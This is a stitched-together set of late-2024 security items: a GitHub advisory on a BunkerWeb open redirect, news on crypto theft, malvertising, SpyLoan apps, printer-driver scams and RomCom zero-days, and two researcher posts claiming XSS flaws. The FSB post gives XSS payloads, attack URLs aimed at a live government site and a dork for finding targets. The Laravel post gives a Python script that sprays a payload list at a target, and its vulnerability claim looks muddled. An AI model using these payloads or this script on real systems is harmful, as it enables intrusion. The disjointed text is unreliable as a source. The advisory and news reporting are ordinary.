### Summary:
A open redirect vulnerability exists in the loading endpoint, allowing attackers to redirect authenticated users to arbitrary external URLs via the "next" parameter.

### Details:
The loading endpoint accepts and uses an unvalidated "next" parameter for redirects:

### PoC:
Visit: `/loading?next=https://google.com` while authenticated. The page will redirect to google.com.

### Impact:
This vulnerability could be used in phishing attacks by redirecting users from a legitimate application URL to malicious sites.

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-53264

**BunkerWeb has Open Redirect Vulnerability in Loading Page**

Moderate severity GitHub Reviewed Published Nov 27, 2024 in bunkerity/bunkerweb • Updated Dec 2, 2024

**Package**

gomod github.com/bunkerity/bunkerweb (Go)

**Affected versions**

< 1.5.11

**Summary:**

A open redirect vulnerability exists in the loading endpoint, allowing attackers to redirect authenticated users to arbitrary external URLs via the "next" parameter.

**Details:**

The loading endpoint accepts and uses an unvalidated "next" parameter for redirects:

**PoC:**

Visit: /loading?next=https://google.com while authenticated. The page will redirect to google.com.

**Impact:**

This vulnerability could be used in phishing attacks by redirecting users from a legitimate application URL to malicious sites.

**References**

*   GHSA-q9rr-h3hx-m87g
*   https://nvd.nist.gov/vuln/detail/CVE-2024-53264

Published to the GitHub Advisory Database

Dec 2, 2024

GHSA-q9rr-h3hx-m87g: BunkerWeb has Open Redirect Vulnerability in Loading Page

The Russian FSB appears to suffer from a cross site scripting vulnerability. The researchers who discovered it have reported it multiple times to them.

/*!  
- # VULNERABILITY: Cross Site Scripting Federal Security Service of the Russian Federation  
- # Authenticated Persistent XSS  
- # GOOGLE DORK: inurl:fsb.ru/fsb/sh.htm?query=  
- # DATE: 2024-11-29  
- # SECURITY RESEARCHER:  E1.Coders  
- # VENDOR: FSB [ http://www.fsb.ru/ ]  
- # SOFTWARE LINK: http://www.fsb.ru/  
- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C  
- # CWE: CWE-79  
*/

  ### -- [ Info: ]

 [i] A valid persistent XSS vulnerability was discovered in the search section of the Federal Security Service of the Russian Federation website.

 [i] Vulnerable parameter(s): sh.htm?query=  < AND >  /fsb/sh.htm?query=

  ### -- [ Impact: ]

 [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.

  ### -- [ Payloads: ]

 `"'><img src=xxx:x \x22onerror=javascript:alert(1)>

 "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />

 `"'><img src=xxx:x onerror\x09=javascript:alert(1)>

  ### -- [ PoC #1 | Authenticated Persistent XSS | Background Image (Stripe Checkout): ]

 http://www.fsb.ru/fsb/sh.htm?query=`%22%27%3E%3Cimg%20src=xxx:x%20onerror\x09=javascript:alert(1)%3E

 http://www.fsb.ru/fsb/sh.htm?query=%22/%3E%3Cimg/onerror=\x20javascript:alert(1)\x20src=xxx:x%20/%3E

 http://www.fsb.ru/fsb/sh.htm?query=`%22%27%3E%3Cimg%20src=xxx:x%20\x22onerror=javascript:alert(1)%3E

  ### -- [ Contacts: ]

 [+] E-Mail: E1.Coders@Mail.Ru

 [+] GitHub: @e1coders

Russian FSB Cross Site Scripting

Laravel version 11.0 suffers from a cross site scripting vulnerability.

    /*!- # VULNERABILITY: Cross Site Scripting Laravel version 11.0 - # Authenticated Persistent XSS- # GOOGLE DORK: inurl:.com/?q=- # GOOGLE DORK: Site:.com/?q=- # DATE: 2024-12-01- # SECURITY RESEARCHER:  E1.Coders- # VENDOR: LARAVEL [https://laravel.com/ ]- # SOFTWARE LINK: https://laravel.com/docs/11.x/installation- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C- # CWE: CWE-79- # download payload https://raw.githubusercontent.com/payloadbox/xss-payload-list/refs/heads/master/Intruder/xss-payload-list.txt*/  ### -- [ Info: ] [i] A valid persistent XSS vulnerability was discovered in of the Laravel version 11.0  website. [i] Vulnerable parameter(s): - inurl:.com/?q=    [AND]    Site:.com/?q=  ### -- [ Impact: ] [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.  ### -- [ EXPLOIT : ]   import requests # Target URLurl = "https://TARGET.com/?q=" # Function to read payloads from a filedef read_payloads(filename="payloads.txt"):    try:        with open(filename, "r") as f:            payloads = [line.strip() for line in f]        return payloads    except FileNotFoundError:        print(f"Error: File '{filename}' not found.")        return [] # Function to perform the requestdef xss_attack(url, payload):    full_url = url + payload    try:        response = requests.get(full_url)        return response.status_code, response.text # return status code and response text    except requests.exceptions.RequestException as e:        print(f"An error occurred during the request: {e}")        return None, None # Main function to iterate over payloads and attackdef main():    payloads = read_payloads()    if not payloads:        return     results = []    for payload in payloads:        status_code, response_text = xss_attack(url, payload)        if status_code:          results.append({"payload": payload, "status_code": status_code, "response": response_text})     #Save results to a file (Example, you might need to adjust based on your desired output)    with open("attack_results.txt", "w") as f:        for result in results:            f.write(f"Payload: {result['payload']}\n")            f.write(f"Status Code: {result['status_code']}\n")            f.write(f"Response: {result['response']}\n\n") if __name__ == "__main__":    main()   ### -- [ Contacts: ] [+] E-Mail: E1.Coders@Mail.Ru [+] GitHub: @e1coders

Laravel 11.0 Cross Site Scripting

Hackers stole $1.48 billion from the crypto industry in 2024. A new report highlights trends in blockchain security, including shifts in target networks.

**SUMMARY:**

*   **Crypto losses in November 2024 totalled $71 million, marking a 79% decrease from the same month in 2023.**

*   **DeFi projects accounted for all reported losses, with no major CeFi incidents recorded.**

*   **BNB Chain became the top target for attacks, hosting 46.7% of incidents, surpassing Ethereum.**

*   **99.96% of funds lost in November came from hacking, while rug pulls accounted for less than $26,000.**

*   **Year-to-date losses in 2024 reached $1.48 billion, a 15% reduction compared to 2023.**

*   **The $1.48 billion lost to hacks and scams in 2024 shows risks despite a 15% drop compared to the previous year.**

The cryptocurrency industry saw a surprising decrease in losses last month, according to a new report from Immunefi, a leading blockchain security platform. While decentralized finance (DeFi) projects continued to be a prime target, the overall figures show a promising trend.

The Immunefi report, shared with Hackread.com, reveals that $71 million was lost to hacks and rug pulls in November 2024, a notable 79% drop from the same month last year.

That figure, while still large, is the second-lowest monthly total this year and means a 79% decrease compared to November of last year. Overall, for 2024, the crypto industry has lost $1.48 billion ($1,489,921,677). While this is a considerable number, it is a 15% drop compared to the same period of 2023, suggesting progress in cybersecurity measures.

The YTD (year-to-date) total of $1.48 billion – Source: Immunefi

****DeFi: Still a Magnet for Malicious Activity****

Immunefi’s findings suggest that all $71 million in losses happened in the DeFi sector, with not a single report of a major hack or exploit affecting CeFi (centralized exchanges). Two noteworthy incidents that stand out are Thala Labs, a decentralized finance firm, lost $25.5 million, and the memecoin trading platform DEXX saw a $21 million loss.

****Hacks Continue to Dominate, Minimal Rug Pulls****

It’s not just the type of platform that shows a trend; the type of attack also shows clear patterns. Of all the funds stolen in November, 99.96% came from direct hacking incidents. Only a tiny fraction, $25,300, was lost through what are called “rug pulls,” where developers abandon a project after raising funds. This suggests that while scams do occur, the more sophisticated exploits are the more damaging threat.

Source: Immunefi

****BNB Chain Takes the Spotlight, Ethereum Drops Back****

The report showed a switch in which the blockchain network was targeted most often. In November, the BNB Chain surpassed Ethereum to become the leading target, hosting nearly half (46.7%) of all attacks. Ethereum came second with 30% of attacks. The rest of the incidents were found across several other networks.

****What Does This Mean?****

The Immunefi report shows a mixed situation for crypto security. While overall losses are down for the year, the dominance of DeFi exploits and the shift of attacker focus to BNB Chain means the fight is far from over.

While the overall loss figure is down, the YTD (year-to-date) total of $1.48 billion lost to hacks and scams still shows a considerable sum. Nevertheless, Immunefi’s report shows that the blockchain industry cannot afford to overlook vulnerabilities and scams, making a solid cybersecurity plan essential.

1.  **6 of the Best Crypto Bug Bounty Programs**
2.  **Top 5 Platforms for Identifying Smart Contract Vulnerabilities** 
3.  **Crypto Industry Lost $685M in Q3 2023, 30% by Lazarus Group**
4.  **Hackers Posed as Google Support to Steal $243 Million in Crypto**
5.  **From Amazon to Target: Hackers Mimic Top Brands in Crypto Scam  
    **

Hackers Drain $1.48 Billion from Crypto in 2024, Led by DeFi Exploits

The scourge of “malvertising” is nothing new, but the tactic is still so effective that it's contributing to the rise of investment scams and the spread of new strains of malware.

Malicious digital advertisements and “SEO poisoning” that gets those ads to prime spots in search results have been mainstays of the digital scamming ecosystem for years. But as online crime evolves and malicious trends like “pig butchering” investment scams and infostealing malware proliferate, researchers say that so-called “malvertising” is still a key technique for scammers—and still a growing problem.

Instances of malvertising in the US were up 42 percent month-over-month in fall 2023 and increased another 41 percent from July to September of this year, according to data from the security firm Malwarebytes. The company says that scammers typically cycle through the advertising accounts used for malvertising quickly, and 77 percent of the accounts are only used once. The bulk of the activity, though, traces back to South Asia and Southeast Asia, Malwarebytes says, with 90 percent of the ad fraud coming from Pakistan and Vietnam, according to the researchers' telemetry. But as with many components of the digital crime ecosystem, malvertising is often offered as a service where cybercriminals from around the world can purchase ads that distribute their malware or lead potential victims to a malicious website of their choosing.

Jérôme Segura, senior director of threat intelligence at Malwarebytes, emphasizes that a particularly effective place for potential victims to encounter malicious ads is in search results, where sponsored marketing content gains legitimacy just by showing up on the same page as legitimate search results. Such malicious ads can even end up getting prime placement in the layout of search results.

“Scammers are using the power of internet and advertising technology, which allows really immense targeting of the right victim. They can get the right ad with the right intent in front of them at the right time,” Segura says. “The fact that scammers are continuing to spend money on advertising shows that these scams are working and they’re getting a return on their ad spend.”

Malvertising has been and continues to be used in phishing attacks and credit card scams, as well as for distributing malware like cryptominers and ransomware. But researchers are increasingly seeing it being used to infect victims with infostealers as well. And researchers from the United Nations Office on Drugs and Crime report that malicious ads have been incorporated into pig butchering and other investment scams, and even romance scams.

“Malvertising is a cyberattack technique that injects malicious code within digital ads,” UNODC notes in a recent report on evolving cybercrime tactics. “Difficult to detect by both internet users and publishers, these infected ads are usually distributed to consumers through legitimate advertising networks. Because ads are displayed to all website visitors, virtually every page viewer is at risk of infection.”

Researchers regularly see malicious ads in search results representing themselves as coming from legitimate businesses and organizations. Whether it's a regional municipality, a utility like a power company, or a big business, people will use search engines simply to pull up the URL of an organization. And if the first results or the most convenient results to click on are ads, scammers have the opportunity to buy this real estate.

“The volume of these things is immense,” says Sean Gallagher, the senior threat researcher at Sophos. “Search engines like Google will say they check the content of ads to ensure they’re safe, but the thing is that attackers are using ad delivery networks and can redirect the URL after the ad is paid for.”

Google is clearly aware that malicious ad activity is growing and evolving. The company specifically addresses misleading and fraudulent ad activity in its policies, including a “misrepresentation policy,” and says that it takes numerous approaches to vetting ads and detecting malvertising. Attackers have continued to develop circumvention methods, though, to avoid having their ads flagged or removed. In 2023, Google blocked or removed about 5.5 billion ads and suspended more than 12.7 million advertiser accounts.

The company has also taken steps over the years to label ads clearly and delineate them in the search results layout. Still, any search engine that’s supported by ads ultimately has the two types of content side by side, especially on mobile, where users have limited screen space.

“We expressly prohibit ads that attempt to circumvent our enforcement by disguising the advertiser’s identity to deceive users and distribute malware," Google spokesperson Nate Funkhouser told WIRED in a statement. “When we identify an ad that violates this policy, we remove it and suspend the associated advertiser account as quickly as possible.”

Sophos' Gallagher points out that criminals can often get the most for their money when buying ads for more unique searches, where they can dominate the ad space and get to the top of the results more organically. But both Sophos and Malwarebytes researchers also regularly see malicious ads running against frequent searches like those for Google, Walmart, Disney+, Slack, Lowe’s, and Apple. Segura even says that Malwarebytes itself has to invest heavily in buying search engine ads just to keep malvertising at bay for the company's brand.

“We have to defend our brand so much,” he says. “People take advantage of that.”

Malicious Ads in Search Results Are Driving New Generations of Scams

Over a dozen malicious Android apps identified on the Google Play Store that have been collectively downloaded over 8 million times contain malware known as SpyLoan, according to new findings from McAfee Labs.
"These PUP (potentially unwanted programs) applications use social engineering tactics to trick users into providing sensitive information and granting extra mobile app permissions, which

8 Million Android Users Hit by SpyLoan Malware in Loan Apps on Google Play

Brands have been at the mercy of the algorithm when it comes to where their ads appear online, but they’re about to get more control.

Digital advertising is a whopping $700 billion (£530 billion) industry that remains largely unregulated, with few laws in place to protect brands and consumers. Companies and brands advertising products often don’t know which websites display their ads. I run Check My Ads, an ad tech watchdog, and we constantly deal with situations where advertisers and citizens have been the victims of lies, scams, and manipulations. We have removed ads from websites with serious disinformation about Covid-19, false election content, and even AI-generated obituaries.

Currently, if a brand wants to advertise a product, Google facilitates the ad placement based on desired ad reach and metrics. It may technically follow through on the agreement by delivering views and clicks, but does not provide transparent data about how and where the ad views came from. It is possible that the ad was shown on unsavory websites diametrically opposed to the brand’s values. For example, in 2024, Google was found to be profiting by placing product ads on websites that promoted hardcore pornography, disinformation, and even hate speech, against the brands’ wishes.

In 2025, however, this scandal will end, as we start to enact the first regulations targeting the digital advertising industry. Around the world, lawmakers in Brussels, Ottawa, Washington, and London are already in the early stages of developing regulation that will ensure brands have access to the legal support to ask questions, check ad data, and receive automatic refunds when they find that their digital campaigns have been subject to fraud or safety violations.

In Canada, for example, Parliament is deliberating the enactment of the Online Harms Act, a law to incentivize the removal of sexual content involving minors. The idea behind this law is that if the content is illegal, then making money off it should be illegal, too.

In California and New York, advocates are also proposing legislation that will aim to implement a know-your-customer law to track the global financial trade of advertising. This is significant because these two states power the global ad tech industry. New York has more ad tech companies than any other city in the world. Transparency laws enacted in California, on the other hand, would affect Google’s international advertising business—by far the biggest ad tech company in the world.

Beyond brand and consumer issues, the unregulated nature of the digital advertising landscape is a direct threat to democracy. In the US, for instance, presidential campaign spending remains effectively unregulated. It is estimated that the presidential campaigns will spend up to $2 billion (£1.5 billion) on digital advertising in 2024. With current laws, we will likely have no external data about their refunds or rates.

In 2025, the legislative pressure is on for big tech companies to regulate ad technology.

The Pressure Is on for Big Tech to Regulate the Broken Digital Advertising Industry

A list of topics we covered in the week of November 25 to December 1 of 2024

December 2, 2024 - The US indictment against an alleged Phobos ransomware kingpin reveals that no company was too small for the cybercriminal gang to hit.

December 2, 2024 - This week on the Lock and Code podcast, we re-air an episode from 2023 about why modern cars want to know about your sex life and a lot more.

November 29, 2024 - Printer issues are very common, but searching Google for help may get you into more trouble than you'd expect.

November 28, 2024 - A researcher has discovered a data broker had stored 644,869 PDF files in a publicly accessible cloud storage container.

November 27, 2024 - LifeLabs managed to hold up a report about a ransomware incident in court for four years. It's now been published.

 A week in security (November 25 &#8211; December 1) 

Printer issues are very common, but searching Google for help may get you into more trouble than you'd expect.

Anyone who has ever used a printer likely has had a frustrating experience at some point. There always seems to be some kind of issue with the software not responding, paper getting jammed or one of many other possible failures.

When people need help, they often turn to Google (and now AI) to look for an answer. This is where scammers come in, preying on unsuspecting and irate users ready to throw their printer out the window.

After clicking on a malicious Google ad, victims are redirected to a fraudulent site often using official brand names and logos. The crooks’ end goal is to get people to call them, and they achieve that by tricking them with fake printer drivers that always fail to install.

In this blog post, we review how this scam works and how to stay away from it.

**Malicious Search Ads**

Two of the most popular printer brands are HP and Canon. If you were to Google for help related to either of those brands right now, you would likely see sponsored results at the top of the search results page.

Unfortunately, in the majority of cases these ads are not from trusted providers but instead from tech support scammers. In the image below, you can see 4 ads shown for the query ‘_hp printer help_‘. It’s only after those that the official HP website appears.

If you were to say that consumers stand no chance, you’d be right. Unless you clicked on the official (organic search results), you’d end up getting scammed.

The list of sites includes:

megadrive\[.\]solutions  
geeksprosoftwareprints\[.\]org  
select-easy123print\[.\]com  
printcaretech\[.\]com

**The driver scam**

A driver is a software program that your computer uses to talk to physical hardware (i.e. your printer). In the early Microsoft Windows days, drivers were very important to get printers, monitors and other peripherals working. Today, the operating system is usually good at detecting new hardware and installing the required drivers automatically. There are some exceptions, not to mention that some manufacturers like to package additional software with their drivers.

After clicking on a malicious ad, the website instructs you to enter your printer’s model number in order to download the required driver, which it proceeds to “install”. This is entirely fake, and the only thing the website displays is a recorded animation that will always end up with the same error message.

This type of error is very similar to those seen in the “Microsoft tech support scam”, typically done via a browser hijack. Scammers want to scare and then get their victims to contact them directly, via phone or live chat.

**Remote access and extortion**

There are many people that fall for these types of scams and entire armies of tech support agents working in poor conditions ready to defraud them. The script is usually standard across scams, with the support agent impersonating a popular brand and requesting personal information from the victim.

It is quite common for scammers to request and be granted remote access to the user’s computer. This gives them leverage to do a number of things, such as stealing data, locking the machine or even using it to log into the victim’s bank account.

This is why it is so important to be extremely cautious with online search ads, and search results in general. Browser extensions such as Malwarebytes Browser Guard will block ads but also the scam or malware sites associated with these schemes.

This won’t help with your printer issues, but at least it’ll save you the trouble of being defrauded. When it comes to such questions, online forums are usually a good place to start, and if you’re lucky to count a computer person in your family, that’s always a good favor to ask for.

 Printer problems? Beware the bogus help 

Watch out for the Russian hackers from the infamous RomRom group, also known as Storm-0978, Tropical Scorpius, or UNC2596, and their use of a custom backdoor.

****SUMMARY****

*   **RomCom Exploits Double Zero-Day:** RomCom, a Russia-linked group used previously unknown vulnerabilities in Firefox and Windows in a sophisticated attack campaign.

*   **Attack Chain:** Visiting a malicious webpage triggered a Firefox flaw, and then a Windows bug allowed the installation of RomCom’s backdoor.

*   **Targeted Sectors:** RomCom targeted government, pharmaceutical, legal, and other sectors in Europe and North America for espionage and cybercrime.

*   **Quick Patches:** Mozilla and Microsoft rapidly released updates to fix the vulnerabilities, highlighting the importance of software updates.

*   **Sophisticated Threat:** The attack shows the advanced capabilities of state-sponsored cyber groups and the need for strong cybersecurity measures.

Cyber security researchers at ESET have exposed a malicious campaign by the Russia-linked **RomCom group**, which combined two previously unknown (zero-day) vulnerabilities to compromise targeted systems including Windows and Firefox.

The attack chain, first detected on October 8th, started with a vulnerability in Mozilla Firefox, Thunderbird, and Tor Browser (**CVE-2024-9680**, CVSS score 9.8). If a user with a vulnerable browser visited a customized webpage, malicious code could run within the browser’s restricted environment without any user interaction. This vulnerability, a “use-after-free” bug in the animation feature of Firefox, was quickly addressed by Mozilla within 24 hours of being notified by ESET.

However, the attack didn’t stop there. RomCom chained this browser vulnerability with another zero-day flaw in Windows (**CVE-2024-49039**, CVSS score 8.8) to bypass the browser’s security “sandbox.” This second vulnerability allowed the attackers to run code with the privileges of the logged-in user, taking control of the system. Microsoft released a fix for this issue on November 12th.

The exploit chain worked by first redirecting users to fake websites, which used domains designed to appear legitimate and included the names of other organizations, before sending them to a server hosting the exploit code.

These fake sites often used the prefix or suffix “redir” or “red” to a legitimate domain, and the redirection at the end of the attack took the victims to the legitimate website, hiding the attack. Once the exploit successfully ran, it installed **RomCom’s custom backdoor**, giving the attackers remote access and control over the infected machine.

Exploit flow (Via ESET)

ESET’s **investigation** shows that RomCom targeted various sectors, including government entities in Ukraine, the pharmaceutical industry in the US, and the legal sector in Germany, for both espionage and cybercrime purposes. The group, also known as **Storm-0978, Tropical Scorpius, or UNC2596**, is known for both opportunistic attacks and targeted espionage.

From October 10th to November 4th, ESET’s data showed that users visiting these malicious websites were primarily located in Europe and North America, with the number of victims ranging from one to as many as 250 in some countries.

This cyberattack campaign goes on to show the importance of quick vulnerability disclosure and patching. It also emphasises the need for users to remain alert and keep their software up to date to prevent exploitation of **zero-day vulnerabilities**.

1.  **Russian Cyber Offensive Shifts Focus to Ukraine’s Military**
2.  **Russian APT29 Use NSO Group-Style Exploits in Attacks, Google**
3.  **Russian Malware Targets Ukrainian Military Recruits via Telegram**
4.  **Russian Hackers Phish Critical Sectors with Microsoft, AWS Lures**
5.  **Russian Midnight Blizzard Breached UK Home Office via Microsoft**

Tag

#google